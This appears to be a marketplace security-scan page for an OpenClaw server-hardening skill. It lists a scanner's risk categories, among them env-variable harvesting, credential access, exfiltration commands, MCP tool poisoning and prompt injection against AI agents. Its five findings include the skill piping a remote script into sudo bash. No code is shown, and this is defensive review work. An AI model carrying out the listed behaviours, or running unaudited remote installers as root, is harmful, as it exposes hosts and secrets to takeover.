ClawHub

OpenClaw Hardening

Security checks across malware telemetry and agentic risk

Overview

This is a real hardening guide, but it asks users to run powerful root-level installers and persistent traffic-monitoring services with limited scoping and safety guidance.

Install only after reviewing the referenced scripts and binaries, pinning versions, and verifying checksums or signatures. Apply SSH and firewall changes from a console or recovery-capable session, confirm required ports first, and define log retention and permissions before enabling proxies, MCP file tools, eBPF observers, or cron jobs.

SkillSpector

By NVIDIA
Vulnerability Patterns
  • Data ExfiltrationExternal Transmission, Env Variable Harvesting, File System Enumeration
  • Privilege EscalationExcessive Permissions, Sudo/Root Execution, Credential Access
  • Excessive AgencyUnrestricted Tool Access, Autonomous Decision Making, Scope Creep
  • MCP Tool PoisoningHidden Instructions, Unicode Deception, Parameter Description Injection
  • Prompt InjectionInstruction Override, Hidden Instructions, Exfiltration Commands
Findings (5)

Description-Behavior Mismatch

Medium
Confidence
90% confidence
Finding
The skill is advertised as a server-hardening/auditing guide, but it adds an unrelated persistent news-ingestion and digest workflow. That expands the system's attack surface, adds ongoing external connectivity and scheduled activity, and can mislead operators into deploying unnecessary components under the guise of security hardening.

Context-Inappropriate Capability

Medium
Confidence
94% confidence
Finding
This section instructs the system to continuously fetch RSS/Reddit/HN content and process it on a schedule, which is not necessary to secure an OpenClaw server. Persistent external collection increases network exposure, introduces supply-chain/content trust risks, and creates new operational pathways that an attacker could abuse or that could fail noisily on a hardened host.

Missing User Warnings

Medium
Confidence
91% confidence
Finding
The guide includes privileged, system-altering commands that modify SSH settings, firewall rules, package state, and filesystem permissions without prominent warnings about lockout or service impact. In a skill context, operators may execute these steps verbatim, risking denial of access or unintended configuration damage.

Missing User Warnings

High
Confidence
99% confidence
Finding
The skill recommends piping a remote script directly into sudo bash, giving an unaudited network-delivered payload immediate root execution. If the upstream repository, transport, account, or referenced script is compromised, the host can be fully taken over.

Missing User Warnings

Medium
Confidence
87% confidence
Finding
The skill directs users to route all LLM API traffic through an intercept proxy and upstream provider endpoints, but it does not clearly disclose what data may still be transmitted or logged. Users could wrongly assume this fully prevents provider exposure, leading to unsafe handling of sensitive prompts or metadata.

VirusTotal

65/65 vendors flagged this skill as clean.

View on VirusTotal